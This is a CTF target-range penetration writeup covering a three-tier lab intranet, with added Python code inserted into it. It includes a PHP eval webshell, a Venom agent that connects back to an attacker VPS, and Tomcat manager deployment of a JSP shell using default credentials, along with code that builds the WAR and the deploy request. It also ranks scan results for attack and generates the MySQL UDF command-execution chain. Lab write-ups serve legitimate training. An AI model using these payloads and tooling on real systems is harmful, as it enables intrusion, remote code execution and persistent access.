Xiyu Duhufu (Protectorate of the Western Regions) Phase 4 CFS Target Range: Penetration Notes
2022-07-02 00:57:00 【Shu Tian】
Official writeup: https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w
Intranet topology
Thanks to Xiyu Duhufu for providing such a good CFS target range.
1.DEDECMS
First, DedeCMS. The member function is disabled, so the front-end login portal is useless.
P.S. Some DedeCMS vulnerabilities:
File upload payloads: https://zhzhdoai.github.io/2019/07/28/Dedecms%E5%90%8E%E5%8F%B0getshell%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/
Backend getshell:
https://zhzhdoai.github.io/2019/03/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-DedeCMS%E5%90%8E%E5%8F%B0getshell/
Brute-forcing the backend directory (I tried this and it worked):
https://mochazz.github.io/2018/02/26/DEDECMS%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95%E6%8A%80%E5%B7%A7/
As usual, start by scanning the website directories.
Scan with dirsearch and your own dictionary:
python dirsearch.py -e php -s 1 -w worlist.dic -u http://xxx/
-s is the delay between requests in seconds (1 s here, so the target is not hammered).

Visit robots.txt:
User-agent: *
Disallow: /ffffffffllllllllllaaaaaaaagggggg22222222222.txt
Disallow: /plus/ad_js.php
Disallow: /plus/advancedsearch.php
Disallow: /plus/car.php
Disallow: /plus/carbuyaction.php
Disallow: /plus/shops_buyaction.php
Disallow: /plus/erraddsave.php
Disallow: /plus/posttocar.php
Disallow: /plus/disdls.php
Disallow: /plus/feedback_js.php
Disallow: /plus/mytag_js.php
Disallow: /plus/rss.php
Disallow: /plus/search.php
Disallow: /plus/recommend.php
Disallow: /plus/stow.php
Disallow: /plus/count.php
Disallow: /include
Disallow: /templets
Visiting /ffffffffllllllllllaaaaaaaagggggg22222222222.txt gives flag2:
flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}
Scanning with Yujian (御剑) also turns up /dede, which is the backend.

Log in with the weak password admin/admin, then upload a file through the backend.
Locally build 1.jpg.php (content: <?php if(md5($_POST["pass"])=="<md5 of your password>"){@eval($_POST["a"]);} ?>), then compress it into 1.jpg.zip.
In the backend file manager, upload the archive 1.jpg.zip to the soft directory.
Visit dede/album_add.php.
Choose "extract images from a zip archive" and browse to 1.jpg.zip.
Fill in the title and the other fields (I also created one myself).
But the album wouldn't upload; once published it was gone. Laughed to death. Later I found that the file manager can upload the shell directly, that's all; I was being stupid.
Connect to it and get flag1 from the root directory: flag{f784234649d7ef161229349d1d76ba8d}
2. Second-tier reconnaissance + forwarding
ifconfig shows two network cards, so try bringing the host online with Venom for intranet pivoting:
https://blog.csdn.net/u011215939/article/details/103403545
https://xz.aliyun.com/t/4058

VPS: ./admin_linux_x64 -lport 1233
Controlled host: ./agent_linux_x86 -rhost [VPS IP] -rport 1233

According to the intranet topology there are three machines in the 172.16.20.x segment; scan the intranet with fscan:
./f -h 172.16.20.1/24

tomcat : WebTitle:http://172.16.20.38:8080 code:200 len:20 title:Apache Tomcat/8.0.43
shiro : WebTitle:http://172.16.20.76:8080/login;jsessionid=F3762797C5577813BA84F48ADAC8D740 code:200 len:10 title:Login Page
weblogic :http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
Set up traffic forwarding: open a socks5 proxy on node1 (in Venom, `goto 1` and then `socks <port>`).
With the socks5 proxy up, turn on a global proxy locally with Proxifier, and the second-tier websites are reachable.
2.1 tomcat
The Tomcat manager interface at http://172.16.20.38:8080/ uses the default credentials tomcat/tomcat.
Following this article (https://blog.csdn.net/zminr411421_/article/details/52115783), get a shell through the manager:
Compress shell.jsp into a zip archive shell.zip, then change the suffix to .war: shell.war.
Deploy it, find the name of the archive you uploaded in the application list, and click into it.
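The zip-rename-to-WAR step above, and the manager deploy that follows it, done in code. This is an added example, not part of the writeup or of the linked article: it packages a JSP into a WAR in memory (a WAR is just a zip; no WEB-INF/web.xml is needed for a bare JSP) and builds the Tomcat Manager text-API deploy request that `curl -u user:pass -T shell.war ".../manager/text/deploy?path=/shell"` would send. The host and credentials are the ones from the page; the context path /shell and the harmless sample JSP are constructed. Caveat: /manager/text requires the manager-script role, whereas the writeup used manager/html (manager-gui), so check conf/tomcat-users.xml before assuming the text API is open.

```python
"""Build a WAR from a JSP and the Tomcat Manager text-API deploy request.
Added example (not the writeup's or the linked article's code)."""
import base64
import io
import zipfile
from urllib.parse import quote
from urllib.request import Request

# Constructed sample JSP; a real engagement would put the Behinder shell.jsp here.
SAMPLE_JSP = b'<%= "deployed" %>\n'


def build_war(jsp_name: str, jsp_body: bytes) -> bytes:
    """Return WAR bytes with jsp_name at the archive root.

    Tomcat unpacks the WAR as-is, so this is exactly the writeup's
    'zip shell.jsp, rename shell.zip to shell.war' step, minus the rename.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(jsp_name, jsp_body)
    return buf.getvalue()


def list_war(war: bytes) -> list:
    """Names inside the WAR, to check what Tomcat will unpack."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.namelist()


def manager_deploy_request(base_url: str, user: str, password: str,
                           context_path: str, war: bytes) -> Request:
    """Build (but do not send) PUT /manager/text/deploy?path=<ctx> with the
    WAR as the body and HTTP Basic auth, i.e. what curl -T would send.
    Needs the manager-script role on the Tomcat side (assumption: the
    tomcat/tomcat account has it; on the range it was only seen via manager/html).
    """
    if not context_path.startswith("/"):
        raise ValueError("context path must start with '/'")
    url = f"{base_url.rstrip('/')}/manager/text/deploy?path={quote(context_path)}"
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(url, data=war, method="PUT")
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/octet-stream")
    return req


def shell_url(base_url: str, context_path: str, jsp_name: str) -> str:
    """Where the JSP lands after deploy: the WAR name (or ?path=) becomes the
    context path, which is the 'find the name of the archive you uploaded' step."""
    return f"{base_url.rstrip('/')}{context_path}/{jsp_name}"


if __name__ == "__main__":
    war = build_war("shell.jsp", SAMPLE_JSP)
    print(list_war(war))
    req = manager_deploy_request("http://172.16.20.38:8080", "tomcat", "tomcat", "/shell", war)
    print(req.get_method(), req.full_url, req.get_header("Authorization"))
    print(shell_url("http://172.16.20.38:8080", "/shell", "shell.jsp"))
```

To actually deploy, pass the returned Request to urllib.request.urlopen through a socks-capable handler (or run it from a host behind the Venom proxy); the block deliberately stops short of sending anything.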

Connect with Behinder (冰蝎) and get flag3 in the root directory: flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

Leave the Tomcat machine for now; I want to use it as the third-tier pivot.
2.2 shiro

A standard Shiro login page.
The memory shell wouldn't connect, I don't know why; flag4 found: flag{22fceae28669c34d139f7ff6db690acb}
2.3 weblogic
fscan found a vulnerability on port 7001:
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750

Exploit it with a Java deserialization exploitation tool and get flag5: flag{b717ca3e4543f05e6970ede833d68ba4}
3. The third tier
The host running Tomcat also has an intranet IP: 10.2.5.20

Bring a Venom node online:
listen 1346 (on the node at 172.16.20.66)
./1 -rhost 172.16.20.66 -rport 1346 (on the Tomcat host; 1 is the uploaded agent binary)
Open a socks channel.
Configure the proxy.
Upload fscan and scan the intranet:
chmod 777 fscan_amd64 (chmod +x is enough)
./fscan_amd64 -h 10.2.5.1/24

10.2.5.33:3306 open
10.2.5.51:445 open
10.2.5.51:139 open
10.2.5.134:80 open
10.2.5.44:8080 open
10.2.5.20:8080 open
10.2.5.20:8009 open
[+] mysql:10.2.5.33:3306:root 123456
[*] WebTitle:http://10.2.5.20:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[*] 10.2.5.51 (Windows 6.1)
[*] WebTitle:http://10.2.5.134 code:200 len:43 title: Film and television - The latest TV series , The latest movie
[*] WebTitle:http://10.2.5.44:8080 code:404 len:0 title:None
[+] InfoScan:http://10.2.5.44:8080 [SpringBoot]
[+] http://10.2.5.20:8080/manager/html tomcat tomcat
[+] http://10.2.5.20:8080 poc-yaml-tomcat-manager-week
Log4j2: http://10.2.5.44:8080 ?
MySQL: 10.2.5.33:3306
SMB: 10.2.5.51 (Windows 6.1), ports 445 and 139 open
JBoss: I didn't find it, but the second tier had a JBoss; is that what it refers to?
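The summary above is produced by reading the fscan output by eye. The following is an added example (my own code, not fscan's and not from the writeup) that parses the line shapes fscan printed in this scan into a per-host inventory and orders the findings the way an operator would attack them: weak credentials first, poc hits second, fingerprints and exposed SMB after. The sample lines are constructed from the output above; fscan's exact formatting varies by version, so treat the regexes as matching this page's output, not every release.

```python
"""Parse fscan output lines into a per-host inventory and a triage order.
Added example; regexes are modelled on the lines shown in this writeup."""
import re
from dataclasses import dataclass, field

# Constructed sample, modelled on the third-tier scan above (not a live capture).
SAMPLE_FSCAN = """\
10.2.5.33:3306 open
10.2.5.51:445 open
10.2.5.51:139 open
10.2.5.20:8080 open
10.2.5.44:8080 open
[+] mysql:10.2.5.33:3306:root 123456
[*] WebTitle:http://10.2.5.20:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[*] 10.2.5.51 (Windows 6.1)
[*] WebTitle:http://10.2.5.44:8080 code:404 len:0 title:None
[+] InfoScan:http://10.2.5.44:8080 [SpringBoot]
[+] http://10.2.5.20:8080/manager/html tomcat tomcat
[+] http://10.2.5.20:8080 poc-yaml-tomcat-manager-weak
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
CRED_RE = re.compile(rf"^\[\+\] (\w+):{IP}:(\d+):(\S+) (\S+)$")      # service creds
TITLE_RE = re.compile(r"^\[\*\] WebTitle:(\S+) code:(\d+) len:\d+ title:(.*)$")
OS_RE = re.compile(rf"^\[\*\] {IP} \((.+)\)$")
INFO_RE = re.compile(r"^\[\+\] InfoScan:(\S+) \[(.+)\]$")
POC_RE = re.compile(r"^\[\+\] (\S+) (poc-yaml-\S+)$")
WEBCRED_RE = re.compile(r"^\[\+\] (\S+) (\S+) (\S+)$")               # url user pass


@dataclass
class Host:
    ip: str
    ports: set = field(default_factory=set)
    os: str = ""
    titles: dict = field(default_factory=dict)        # url -> title
    fingerprints: dict = field(default_factory=dict)  # url -> fingerprint
    creds: list = field(default_factory=list)         # (service-or-url, user, pass)
    pocs: list = field(default_factory=list)          # (url, poc name)


def ip_of(url: str) -> str:
    m = re.search(IP, url)
    return m.group(1) if m else url


def parse_fscan(text: str) -> dict:
    """Return {ip: Host}. Order of checks matters: the specific patterns run
    before the generic 'url user pass' one so a poc line is not read as creds."""
    hosts = {}
    host = lambda ip: hosts.setdefault(ip, Host(ip))
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if m := PORT_RE.match(line):
            host(m[1]).ports.add(int(m[2]))
        elif m := CRED_RE.match(line):
            host(m[2]).creds.append((m[1], m[4], m[5]))
        elif m := TITLE_RE.match(line):
            host(ip_of(m[1])).titles[m[1]] = m[3]
        elif m := OS_RE.match(line):
            host(m[1]).os = m[2]
        elif m := INFO_RE.match(line):
            host(ip_of(m[1])).fingerprints[m[1]] = m[2]
        elif m := POC_RE.match(line):
            host(ip_of(m[1])).pocs.append((m[1], m[2]))
        elif m := WEBCRED_RE.match(line):
            host(ip_of(m[1])).creds.append((m[1], m[2], m[3]))
    return hosts


def triage(hosts: dict) -> list:
    """(priority, ip, note) sorted by priority; lower is attacked first."""
    items = []
    by_ip = sorted(hosts.values(), key=lambda h: tuple(int(o) for o in h.ip.split(".")))
    for h in by_ip:
        for where, user, pw in h.creds:
            items.append((0, h.ip, f"weak credential {where} {user}:{pw}"))
        for url, poc in h.pocs:
            items.append((1, h.ip, f"poc hit {poc} at {url}"))
        for url, fp in h.fingerprints.items():
            items.append((2, h.ip, f"fingerprint {fp} at {url}"))
        if h.ports & {445, 139}:
            items.append((3, h.ip, f"smb exposed ({h.os or 'os unknown'})"))
    items.sort(key=lambda t: t[0])   # stable sort keeps ip order within a priority
    return items


if __name__ == "__main__":
    for prio, ip, note in triage(parse_fscan(SAMPLE_FSCAN)):
        print(prio, ip, note)
```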
3.1 mysql
MySQL has a weak password:
[+] mysql:10.2.5.33:3306:root 123456
Connect with Navicat. The flag isn't in the database, so it must be on the server; we need MySQL to read files or run Linux commands for us.
When the MySQL secure_file_priv setting is empty (empty means "", not NULL; NULL means file access is disabled entirely) or names a directory, load_file() can read files (any path in the first case, only under that directory in the second). The account also needs the FILE privilege, which root has.
Check secure_file_priv from the mysql command line:
show variables like "%secure_file_priv%";

Files can be read, but I don't know where the flag is.
So use a UDF to escalate and execute commands:
show variables like '%compile%'; # view the host OS and architecture (the .so must match them)
show variables like 'plugin%'; # view the plugin directory


/usr/local/mysql/lib/plugin/
Escalate with MDUT's UDF function.
References: https://m.xp.cn/b.php/58475.html
https://xz.aliyun.com/t/7392#toc-12
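The secure_file_priv rule and the UDF chain above, written down as code. This is an added example, not MDUT's code and not from the writeup: it models the three secure_file_priv states (NULL, "", directory) so you can tell in advance whether load_file() and INTO DUMPFILE will be allowed for a given path, and it emits the statements MDUT runs to drop the shared object into plugin_dir, register it, and call it. The plugin_dir is the one found above; the UDF name sys_eval, the file name udf.so and the hex bytes are placeholders (a real .so, matching the OS/arch from `show variables like '%compile%'`, goes there). The check only covers secure_file_priv; the FILE privilege and the mysqld user's write access to plugin_dir are assumed.

```python
"""secure_file_priv semantics and the UDF load chain, as an added example."""
import posixpath

# What to run first; these are the checks the writeup does by hand.
CHECK_QUERIES = [
    "show variables like '%secure_file_priv%';",
    "show variables like '%compile%';",   # OS/arch: the .so must match
    "show variables like 'plugin%';",     # where CREATE FUNCTION looks for .so files
]


def file_access_allowed(secure_file_priv, target_path: str) -> bool:
    """secure_file_priv (MySQL 5.7+/8.0):
       NULL   -> LOAD_FILE and SELECT ... INTO OUTFILE/DUMPFILE are disabled
       ''     -> any path the mysqld OS user can reach
       '/dir' -> only paths under that directory
    NULL is modelled as Python None, the empty setting as ''.
    Paths are normalised so '/dir/../../etc/passwd' does not slip through."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = posixpath.normpath(secure_file_priv)
    target = posixpath.normpath(target_path)
    return target == base or target.startswith(base.rstrip("/") + "/")


def udf_statements(plugin_dir: str, so_hex: str, so_name: str = "udf.so",
                   func: str = "sys_eval", cmd: str = "id") -> list:
    """The UDF chain: write the shared object with INTO DUMPFILE (raw bytes,
    unlike OUTFILE which escapes), register it with CREATE FUNCTION ... SONAME,
    then call it. so_hex is the hex of the .so file (placeholder here)."""
    so_path = posixpath.join(plugin_dir, so_name)
    return [
        f"SELECT 0x{so_hex} INTO DUMPFILE '{so_path}';",
        f"CREATE FUNCTION {func} RETURNS STRING SONAME '{so_name}';",
        f"SELECT {func}('{cmd}');",
    ]


def udf_precheck(secure_file_priv, plugin_dir: str, so_name: str = "udf.so") -> str:
    """Decide whether the DUMPFILE step can even succeed under secure_file_priv."""
    so_path = posixpath.join(plugin_dir, so_name)
    if not file_access_allowed(secure_file_priv, so_path):
        return f"blocked: secure_file_priv={secure_file_priv!r} does not allow writing {so_path}"
    return f"ok: can dump {so_name} into {plugin_dir}"


if __name__ == "__main__":
    PLUGIN_DIR = "/usr/local/mysql/lib/plugin/"   # from 'show variables like plugin%' above
    for q in CHECK_QUERIES:
        print(q)
    for sfp in (None, "", "/var/lib/mysql-files/"):
        print(repr(sfp), "->", udf_precheck(sfp, PLUGIN_DIR))
    for stmt in udf_statements(PLUGIN_DIR, "7f454c46"):   # placeholder ELF magic, not a real .so
        print(stmt)
```

The usual field result is the third case: secure_file_priv points at /var/lib/mysql-files/ (the 5.7+ default), so load_file() works only under that directory and the DUMPFILE into plugin_dir is refused; an empty setting like the one on this range is what makes the UDF route viable.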

Get flag7: flag{4e137c4035538ba1f76ce4d661c3006f
3.2 Smb
SMB: 10.2.5.51 (Windows 6.1), ports 445 and 139 open
Configure ProxyChains inside Kali:
https://www.cnblogs.com/student-programmer/p/6727346.html
vim /etc/proxychains4.conf

Launch msf through the proxy:
proxychains msfconsole
That's it; the socks connection was unstable and SMB never worked, and later the range was shut down, so I didn't attack it further.
